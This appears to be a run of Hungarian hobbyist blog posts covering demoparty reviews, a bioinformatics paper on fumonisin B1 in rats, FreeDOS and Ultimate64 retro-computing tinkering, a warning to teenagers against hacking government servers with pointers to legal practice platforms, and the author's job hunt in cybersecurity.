Nem tudom, mi történt idén ebben a kategóriában, de alulmúlta a várakozásokat. Az, hogy technikai szinten kevesek voltak, az egy dolog, hiszen vannak nagyon jó 4k intrók, amik nem olvasztják le a GPU-t. Ami legjobban fájt, hogy nem volt egyetlen valamire való ötlet sem. Olyan volt, mintha lusták lettek volna optimalizálni az 1k intróikat, ezért beadták 4k-ba. Egyedül a There's a place where we can be a Coma-tól próbált meg valami ötletet felmutatni. A Technomancer-nek meg jár a nagy piros pont, amiért Linuxot használtak.

1k intro

Ha már 1k. Nem volt túl sok induló, de a Bones of Civilisation a Fulcrumtól legalább iránymutató volt. Több jelenetből állt, mint a legtöbb 4k.

Fantáziátlan konzolok

Már van MicroW8 is, ha az eddigi platformok nem lennének elegek. A célja, hogy intró platform legyen, ezért Assemblyn egy 256 byte intrót mutattak be rajta. Összességében ha nem lett volna ez a komó, akkor sem lett volna semmi.

Oldskool demo

Az "igazi" oldskool platformok (Amiga, Atari, C64) nem itt mutatják be a legjobb alkotásaikat, ami meg is látszott a mezőnyön. A PC-Dos demók az összeset lenyomták, nem is alaptalnul. Azért kíváncsi lennék, ha tényleg egymásnak feszülne a Dos és az Amiga egy kompóban, melyik kerülne ki győztesen? Talán a jövőben egyszer megtudjuk, jelenleg viszont számomra az Aleph Null volt a befutó. Nem csak azért, mert nagyon ötletes volt, hanem azért, mert a teljes cross-platform forráskód elérhető. Nagyon megéri átnézni mindenkinek, aki demót akar fejleszteni.

Demo

A mezőny nagyon erős volt. A látványra nem lehetett panasz, ami nem meglepő, hiszen az Unreal, Notch és társai uralták a kompót. Az első 6-7 helyezett mind szórakoztató, látványos alkotás volt. A zene is páratlan volt. Érződött, hogy beleadtak mindent a srácok. Többen felvetették fórumokon, hogy egyes demóknál a jelenetek kicsit kuszák, ami igaz, de szerintem csak ezért nem kell az egész alkotást lehúzni. A Doomsday Fast Forward II-je egy teljes koncertet varázsolt a néző elé. A Pyrotech cyberpunk motoros izéje is nagyon jó volt. Aikapallo zenéje sokat emelt az amúgy kicsit kusza mondanivalón, de ha meg kellene fogalmazni, miről is szólt, gondban lennék. Álljon itt egy videó a győztes Wunderlust-ról, de aki teheti, a többit is nézze meg.

Összegzés

Az idei Assembly elég jó volt, kicsit hullámzó minőséggel. Egyes kompók nagyon jók voltak, de akadt bőven olyan kategória is, ahol a teljes felesleges bármit megnézni.

Van, hogy nem elég annyi munkát beletenni egy cikkbe, mint amennyit terveztünk. A folyamatos revíziók hatására még egy nagy cikkből is lehet még nagyobb. Ilyenkor kell beletolni 110%-ot:

A munka úgy kezdődött, hogy az egyetem kiválóság programjában volt több közösségi esemény is, és az egyik ilyen során beszédbe elegyedtem a kémia tanszék egyik munkatársával. Elég nagy munkát készítettek elő, ahol a fumonozin B1 hatását nézték patkányokra. Néztek szövethisztológiát, mérték több lipid vegyület koncentrációját és kíváncsiak voltak a vegyület génexpresszióra gyakorolt hatására is. Itt jöttem én a képbe.

Az egyetem szolgáltatás rendelési szabályai szinte lehetetlenné teszik, hogy újgenerációs szekvenálásokat vegyünk igénybe, ezért expressziós chip-pel mérték a gének aktivitását, és kellett valaki, aki még emlékszik ezekre a módszerekre. Igaz, a cégek elvégzik az elemzést is, már benne van az árba, de egyéni igényekkel, melyek túlmutatnak egy Excel tábla generálásánál, már nem vesződnek.

A felsorolt módszerekből is látszik, hogy elég nagy szabású munka volt. Ami számomra nagy öröm volt, hogy a kísérleti elrendezéssel nem volt semmi probléma. Megvolt a megfelelő számú ismétlés, az expressziós, lipidomikai és szöveti minták ugyan azokból az állatokból származtak. Egyszóval minden együtt volt, hogy egy nagyon jó munka készüljön.

Az elemzést ezért gond nélkül elvégeztem, és az eredményekkel kapcsolatban sem jöttek elő olyan problémák, mint máskor, hogy "nem látszik a kedvenc gén". Mert nem volt kedvenc gén sem. Nyitottan álltak hozzá minden eredményhez, amit csak kaptunk. Professzionális volt a teljes kivitelezés.

Bár látszólag minden zökkenőmentesen haladt, a kézirat elfogadása mégsem ment simán. Több ellenőrző kísérletet kértek, részletesebb módszertant, és olyan korrelációs elemzéseket, amelyekre nem is gondoltunk, hogy érdemes lenne megcsinálni. (Bár a bírálónak igaza volt, ha ennyi adatunk van, bűn nem megnézni, mi-mivel korrelál.) Ez utóbbi elvégzése csak a gépidő tekintetében volt problémás, mert R-ben nem tudtam úgy megoldani a számításokat, hogy ne hónapokat vegyen igénybe. Úgyhogy C-ben implementáltam egy Pearson-korreláció számoló programot. Az alapja már megvolt régebben, csak annyit csináltam, hogy kiterjesztettem a programot két bemeneti mátrixra. Plusz hozadékként kijavítottam pár hibát egy hozzá kapcsolódó régi kódban.

A kézirat meg csak hízott, hízott, mint a mesebeli kisgömbőc. De nem pukkant ki, hanem megjelent. Nagyon jó kis munka volt, nem volt stresszes, és közben remek embereket ismertem meg. Elég sok időt kellett belefektetni, de nem voltak felesleges kanyarok, mint más projekteknél. Megvolt a kitűzött cél, és csak menetelni kellett előre. Az eredmények mégis nagyon bíztatóak. Szuper munka volt!

Nem indult jól a party. A demóval elkészültem, de két geometry shaderrel kapcsolatod bugot nem sikerült kiírtani. Úgy döntöttem, benne maradnak. Az utazással nem volt probléma, a party helyszínéül szolgáló művelődési házat is gyorsan megtaláltam. Legalábbis azt hittem. Kiderült, hogy a művelődési ház több épületből áll, ami a város különböző pontjain van. Alaposabban meg kellett volna néznem a kiírást. A rossz művelődési házból kifelé jövet összefutottam egy emberrel, aki folyamatosan telefonált, és szintén a demóparty helyét kereste. Együtt folytattuk az utat, ő párhuzamosan beszélt velem, és a telefon másik végén lévő entitással is.

Ahogy közeledtünk a party helyszínéhez, már ismerős arcok is fel-feltünedeztek, így folyamatosan közeledtünk a jó irányba. A piacon átvágva pedig már csak a zenét kellett követni.

Még soha nem voltam Szekszárdon, úgyhogy útközben sokat nézelődtem. Nagyon jó, hogy nem csak az unalomig ismételt helyeken vannak a partik, hanem van egy kis frissítés is.

A regisztráció gyorsan megvolt, és a demót is feltöltöttem. Hurrá! Volt egy coding room. Szék volt elég, asztal már kevesebb, ennek ellenére elrétünk. Egy kisebb projektoron itt is lehetett figyelemmel kísérni az eseményeket normál hangerőn. A nagyteremben voltak a székek, a nagy hangerő, nagy vászon, stb. DJ szetteket a teraszon tartották, mert volt terasz is. A party helyszín szerintem jó választás volt.

Először egy kerekasztal beszélgetés volt az AI-ról és a demoscenéről. A szervezők célja parázs viták kiváltása volt, ehhez képest elég visszafogott volt a megnyilvánulás. Nem hiába, szinte mindenki AI-t használ, így elég nehéz két álláspontot bemutatni. Pasy pedig igyekezett provokatív kérdéseket bedobni, de ez sem segített. Úgy látszik az AI győzött, behódolt neki mindenki. Emiatt is voltak számomra sokkal érdekesebbek azok a megnyilvánulások, amikor eltértek a témától, és arról beszéltek, hogy miért X-re adják be a C64 demók legjobbjait, vagy arról, hogy milyen problémákat okoz, ha a szervezők nem veszik észre a csalással készült képeket és rossz embernek ítélnek díjat. (Meg úgy általában miért nehéz grafikai compót lebonyolítani.)

Volt egy játék kompó, hol a zene ritmusára kellett irányt váltani egy kocka felszínén. Bevallom, én nem tudom, hogy honnan hallották a ritmusváltást, mert nekem totál nem jött át. Mindegy, a lényeg, hogy a résztvevők értették a játékmenetet.

Az első igazi kompó természetesen a zene kompó volt. Filippp adott be zenét! Totál meglepődtem, hogy más MoonShine tag is adott be valamit. (Bár nem tudom, mennyire számít még MoonShine tagnak, túl képlékeny a csapat összetétele.) A kompóra nem lehetett panasz, sok jó zene volt.

Mivel nem volt se fotó, se grafika compó, a lelkes emberek megtöltötték a wild compót. "Igazi wild"-ból kettő volt. Egy kötőgép automatizálás (bár nem értek a kötőgépekhez, ezért nem értettem, mit is csinált a vezérlő elektronika és miért kellett ez a sok manuális munka) és egy pici mikrokontrolleres vezérlés. Mindkettő Anthiemes/Helguli duótól.

Az oldschool compót ledarálta a Lethargy. Egy C64-es scrollerrel, és (meglepetés!) Apple 2 demóval. Erre nem sokan számítottak. De volt TVC a Fast&F, Vector-60 az oroszoktól, és ZX Spectrum Kaszitól.

Szóba elegyedtem Jimmivel, aki kérdezte, mi lesz a demóval, én meg elpanaszoltam, hogy két hibát nem tudok kijavítani. Gondoltam, hátha tud segíteni, ezért elmondtam neki, mi is a probléma. Azt mondta, nem ért a geometry shaderhez, de azért mutassam meg a problémát. Végiggondolta, amit mondtam neki, és elmondta, hogy szerinte hogyan kellene megoldani. És tényleg az volt a megoldás. Álmomban sem gondoltam volna, hogy ez lesz a probléma. Írok róla egy posztot részletesebben.

A 256 byte intrók jók voltak. Az intrók pedig a méret növekedésével arányos minőséget képviseltek, és ez az eredményhirdetésen is meglátszott. A demó vetítésénél nem tudom, mi történt, mert ott vált világossá, hogy a laptopom fülhallgató kimenetén nem megy ki a hang. Kiment a HDMI-n, a beépített hangszórón, de a rohadt jack csatlakozón nem. Már majdnem feladtam, amikor Maugli azt javasolta, hogy tartsuk oda a mikrofont a hangszóróhoz. Úgyhogy lement, de a bohóckodás miatt a legtöbb demóról lemaradtam.

Szerencsére Netro alkotásáról nem. A mostani demó egyfajta rávilágítás volt korunk egyik társadalmi problémájára, szándékosan egy olyan példával, ami már történelem. Elkerülve ezzel minden aktuálpolitikai utalást. Nagyon ügyes megoldás és természetesen igényes, magas szintű megvalósítás. Ahogy Maugli az eredményhirdetésen is megemlítette, már nem is utálja a "javascriptes bohóckodást". Hmm, vajon egy PICO-8 demóval is meg lehetne változtatni a véleményét?

A Linux kapcsán beszédbe elegyedett velem egy kissé ittas fickó. Elmesélte, hogy '98-ban befuccsolt a cég, akiknél dolgozott, és félbemaradt egy virtuális valóság projekt, amit ő már öt éve fejlesz. Hogy érzékeljétek, micsoda teljesítmény van az öt év mögött, elég, ha idézem egy mondatát: "Én a bármelyik demót leprogramozom Windows 95-re egy óra alatt. Csak nem érdekel a demoscene." Ennek ellenére a projektje nem használ z-buffert, hanem stencil bufferekkel oldja meg a takarásokat, és panaszkodott, hogy összetett jeleneteknél valami miatt nem működik.

Nem volt tiszta számomra, hogy azt akarja, én is a projekten dologozzak-e vagy ne, mert vagy arról kérdezett, hogy én hogyan oldanék meg különböző problémákat, vagy arról beszélt, hogy nincs senki, aki nála jobban programozna. Végül mondtam neki, hogy én nem vagyok jó programozó, nekem ez csak hobbi. Ezzel lezártam a kakasviadalt és a kooperáció lehetőségét.

Az eredményhirdetésen megtudtunk néhány részletet a parti szervezés kulisszatitkairól, ami érdekes volt. Az elmondottak alapján a szervezőknek kevesebb terhet jelentett ezen party lebonyolítása, így várható, hogy lesz folytatás. Én legalábbis nagyon várom, hogy legyen!

Jó dolog, ha tizenévesként a számítógépet nem csak arra használod, hogy Fortnite-ozz, Minecraft-ozz, vagy trollkodj a közönséges médián. Az sem baj, ha megismersz néhány webes sebezhetőséget. Még abban sem látok kivetni valót, ha kétes hírű Discord szervereken tanulsz a gempacsinálásról (linkelt video 35. másodperc).

A probléma akkor kezdődik, ha kormányzati szervereken csinálod a gempát. Mert lehet, hogy béna a kormányzati szerverek védelme, de nem éri meg feltörni őket. Lehet, hogy nem kapnak el egyből, de előbb-utóbb elkapnak. És nagyon kellemetlen, ha épp a #nudes könyvtárat böngészed (37. másodperc). Nem fogják elhinni, hogy biológia órához keresel háttéranyagot. Oh, igen, a Flipper Zerodat is elveszik.

Bizony, lefoglalják azt is a gépeddel együtt. Az összes azon tárolt adatot, minden bejelentkezésed megnézik:

Van jó hírem is. Ha tényleg érdekel a hekkelés, akkor legálisan is csinálhatod. Próbáld ki a TryHackMe-t! Egy csomó feladatot ingyen is megcsinálhatsz, ha pedig megtetszik, előfizethetsz ré. Ki tudja? Talán valami újat is tanulsz közben. Ha meg túl könnyűnek találod őket, ott a HackTheBox. Az egy magasabb szint.

Mi? Valami másra vágysz? Utálod, hogy elérhetetlenné válnak a virtuális gépek? Nem tetszi a böngésző-központúság? Semmi baj. Ott van a VulnHub. Letöltheted a virtuális gépeket magadnak és a saját tempódban fejtheted meg a titkaikat. Ízekre szedheted őket.

Még ez sem tetszik? Túl mesterséges, steril? Igazad van. Jobb lenne valódi szervereket felnyomni, mi? Erre is van lehetőség. A HackerOne pont ezt kínálja. Valódi cégek, valódi szerverek, valódi szolgálgatások tesztelése. Pénzt is adnak, ha elég ügyes vagy, cserébe be kell tartani a játékszabályokat. Csak azt, és csak úgy hekkelheted, ahogy előírják.

Láthatod, van választásod. Hiába mondod, hogy "kiskorú vagyok, úgysem mehetek börtönbe". Lehet, de a bizalmat akkor is elveszíted. Az ismerőseid másképp fognak rád nézni. És a bizalmat a legnehezebb visszaszerezni, mert ezután bármi történik körülötted a gépekkel, elsőre téged vesznek elő. Lefagy a Windows otthon? "Kisfiam, mit csináltál már megint?" Összeomlik a suliban a Kréta? "Biztos ő volt! A rendőrök is bevitték már!" Lehet, hogy csak egy botlás volt, de rohadt sokáig veled marad.

Az ősrégi laptopom operációs rendszerét frissítettem FreeDOS 14-re. Az új rendszer hordoz néhány érdekességet, ami miatt érdemes írni róla. Igazából három fontos hardver támogatása hiányzik a laptopról, hogy nyugodt szívvel hátradőlhessek: hangkártya, USB, hálókártya. A hálókártya csak külső PCMCIA lehet, ezt még nem sikerült beszerezni. A gépen van 1.1-es USB támogatás, ez már a korábbi FreeDOS verziók is támogatták, de csak nagyon lassú átvitelt lehet vele elérni. A hangkártya egy Via, egyes leírások szerint SB kompatibilis. Lássuk, mennyire teljesíti kívánságaimat az új FreeDOS. (Nos, nem teljesen új, most jutottam oda, hogy kipróbáljam, de tekintve, hogy az új verziók nem sűrűn követik egymást, ez nem olyan nagy probléma.)

Először is, a telepítő már nem a gyökérkönyvtárba szórja ki a telepített programokat, hanem tematikus könyvtárakba helyezi, ami sokkal jobban átláthatóvá teszi a rendszert. Az fdimples program rendesen megtalálja a csomagokat a CD-n, nem kell varázsolni, mint a 13-as előzetes verziójánál.

A hangkártya esetén létezik egy SBEMU program, ami a legtöbb alaplapi hangkártyát SoundBlasterként emulálja. A leírás szerint a hangkártyám a támogatott listán volt, ezért bizakodó voltam. Ha ez rendesen fog működni, akkor a három kívánságból egyet kipipálhatunk. Maga a hardver biztosan működik, mert egy Knoppix CD-ről bootolva tudok hangfájlokat lejátszani. Be is állítottam a hangerőt, amire külön tekerő van a laptop oldalán.

Az SBEMU futtatásához kell egy saját QEMM kompatibilis memória kezelő, de ezt a csomag tartalmazza. A doksi alapján bekonfiguráltam. Az SBEMU futtatása után kiírta a hangkártya típusát, majd azt, hogy valós és védett módban is van emuláció. Hurrá! Elindítottam a Doom-ot. Nincs hang. Oh.

Az SBEMU-nak van egy forkja, amit szintén tartalmaz a FreeDOS, ez a VSBHDA. Ez elméletileg egy letisztultabb emulátor, könnyebb is elindítani, mert csak a start.bat kell. Elindítottam, és semmi. A Doom szörnyei továbbra is némák voltak.

Az USB működik, de továbbra is tetü lassú. 3 b/s sebességgel másol. Egy 256 byte intrót még ki tudok várni, de nagyobb programok másolása már kivitelezhetetlen. Ezt nagyon sajnálom. Ha ezen lehetne valamit gyorsítani, az hatalmas segítség lenne, hogy fájlokat hozzak-vigyek.

A telepítésnél még egy probléma volt, de ez nem rendszer specifikus. Valószínűleg hibás volt a CD írás, mert a teljes rendszert nem tudta telepíteni, írás-olvasási hibát jelzett. Nem is akartam mindent felrakni, a fent említett programokat meg enélkül is tudtam telepíteni.

Összességében az új rendszer tetszik, a hangkártya emulációval viszont még várni kell.

Az USB probléma egyedül egy másik felhasználónál jelentkezett csak, neki a pendrive működött rövid ideig. Az illető nekilátott méregetni, de nem jutott közelebb a megoldáshoz. Viszont valaki pedzegetni kezdte, hogy talán egy hőmérsékleti problémával van gond.

Gondoltam, ezt könnyen tudom tesztelni. Rátettem egy hatalmas ventillátort az FPGA-ra. Rádugtam pendrive-ot, USB billentyűzetet, és néztem, mi lesz a vége.

Az első meglepetés az volt, hogy 5 másodperc után már a kép is eltűnt. A sok ki-be kapcsolgatás után rájöttem, hogy a pendrive-omat valami miatt nem szeretti. Másik típussal vígan működött. Miután ezt megoldottam, feltűnt, hogy a billentyűzet működik. Sokáig. Gondoltam, kihasználom a nyerő szériát, és megnézem a rendszermenüt, amit az F2 billentyűvel lehet elérni. Itt észrevettem, hogy a képernyő mód NTSC-re van állítva. Ezt gyorsan PAL-ra módosítottam. Ezután el tudtam indítani a Lethargy demókat! Minden ment flottul.

A hang is HDMI-n jött, nem a saját hangszórón, ezért sokkal jobban szólt minden egyes dal.

Kipróbáltam, ha a PSID-et, átnevezem SID-re, akkor lejátsza-e? Lejátszotta az összes Árok SID-et! A lányom berohant a szobába, mert nem tudta elképzelni, mi ez a nagy zene-bona, amit csapok.

Teljesen el voltam hülve. Mi történik, kérem? Mi ez a sok siker ilyen rövid idő alatt?

Miután végighallgattam és néztem mindent, jött a kontroll kísérlet. Kikapcsoltam mindent, levettem a ventit, és újra elindítottam az Ultimate64-et. A billentyűzet 5 másodperc múlva megadta magát. Oké. Visszatettem a ventit, hagytam, hogy fújja kicsit az FPGA-t, majd visszakapcsoltam a gépet. Megint sokáig ment a billentyűzet.

Most már biztos, hogy nem fogom C64 házba tenni. Szükség lesz hűtésre. Ha szerencsém van, elég lesz a passzív, ha nincs, aktív hűtés kell.

A középkorú férfiak meg szoktak bolondulni. Vesznek egy méregdrága sportkocsit, hogy gyérülő hajukat még egyszer utoljára fújja a szél, esetleg a feleségüket cserélik le egy 20 éves nőre, a ferde pillantásokra meg úgy válaszolnak: mit nézel? Már nagykorú! Habár a feleségem jól van, és sportkocsikat is csak a GTA-ban vásárolok, azért én sem vagyok kivétel.

Mint az a szemfülesebb olvasóimnak feltűnhetett, egyre kevesebb a bioinformatikai témájú bejegyzés, viszont megszaporodtak azok, amelyek kibervédelemmel kapcsolatosak. Ez nem véletlen. A bioinformatika, mint szakma, úgy látom szűkül. Nem látom, hogy annyira menő, mint 20 évvel ezelőtt. A cybersecurity viszont menő, egyre nagyobb szükség van rá, ahogy azt a törvényi szabályozásban is látni lehet. Elhatároztam, hogy betörök a piacra. Mivel semmi releváns munkatapasztalatom nincs, sejtettem, hogy körberöhögnek, ha beadok egy önéletrajzot, ezért elvégeztem egy tanfolyamot, CTF-eket oldok meg minden nap, és igyekeztem a munkámba is beemelni a kibervédelmet. Lássuk mire volt ez elég.

Csak olyan álláshirdetésekre adtam be jelentkezést, ahol junior pozícióra kerestek embert, vagy legfeljebb 1 év tapasztalatot kértek. Etikus hekker, pentester vagy ezekhez hasonló pozíciókat céloztam meg. A kiírások legtöbbjében feltétel, hogy TryHackMe, Hack the box tapasztalat legyen, némelyik kér legalább szkriptelési ismereteket. A tanúsítványok az "előnyt jelent" részben voltak felsorolva. Csak olyan helyre adtam be, ahol a kiírásnak megfeleltem. Nem csak az állásportálokat céloztam meg, hanem a profilba vágó cégek weboldalait is végignéztem, és ahol folyamatosan kerestek embert, oda is írtam. Fizetési igénynek az ISACA Fizetési helyzetkép 2023 című kiadványát vettem alapul, amit a 2024-es Hacktivity-n szereztem. Állami cégeknél nem írtam fizetési igényt. ( Ott úgyis annak kell örülni, ha fizetnek :-) )

Az eredmény számomra sokkoló volt. Egyedül a Deloitte volt, akik egyáltalán visszaírtak! Máshol még arra sem vették a fáradságot, hogy jelezzék, megkapták a jelentkezésemet. Bizonyára egy fekete lyuk működik az IT részlegen, ami beszippantja a CV-ket. Egyetlen interjúra sem került sor.

Őszintén szólva, nagyon felbosszantott a dolog, ezért az egyetemünk állásbörzéjén odamentem az egyik céghez, akikhez adtam be önéletrajzot, hogy megértsem mégis mi történik a munkaerő piacon. Ott a cég képviselőjének lmondtam, hogy mi szerepel a kiírásukban, nekem ebből mi van meg, majd megkérdeztem, miért nem hívtak be interjúra? A hölgy azt mondta, csak akkor nézik át a beérkező interjúkat, ha "fentről szólnak, hogy kell ember". Ez azt jelenti, hogy nem keresnek folyamatosan embert? - kérdeztem. Nem, ők folyamatosan keresnek embert. Akkor van a jelentkezésnek felső korhatára? Nem, nincs. A válaszhoz nem jutottam közelebb.

Azért furcsa nekem ez a helyzet, mert tizenöt évvel ezelőtt programozós állásokra jelentkeztem. Nem volt még egy OKJ-s papírom sem, de minden megpályázott helyre behívtak interjúra. Az interjú nem csak a munkaadónak volt hasznos, hanem nekem is, mert láttam, mit várnak el, láttam, hol vannak a saját hiányosságaim. Ebből tudtam meg például, hogy semmi értelme számomra C++-os állásokra jelentkeznem, mert soha nem leszek azon a szinten, ami egy ilyen állás betöltéséhez kell.

Manapság már mások a viszonyok. Megértem, hogy nincs szüksége egyetlen cégnek sem egy "ősz hajú padawanra", de akkor írják ki. (Persze nem fogják kiírni, mert az diszkriminációnak számít.) Azt is megértem, hogy nálam sokkal tehetségesebb emberek keresnek munkát, sokkal nagyobb tudásbázissal, de akkor a kiírásokat igazítsák ehhez a szinthez. Akik "folyamatosan" keresnek embert, ezt könnyen megtehetik. Nem hiszem, hogy a HR annyira örül, hogy egy rakás alkalmatlan önéletrajzot kell átnézni, amikor tudják, hogy milyen kvalitásokra van szükségük.

Mindegy, ezt a rejtélyt sem én fogom megfejteni. Ami viszont biztos, hogy a meccsnek még nincs vége. A cybersecurity annyiből különleges hivatás, hogy úgy is lehet művelni, ha nem 9-től 5-ig dolgozol...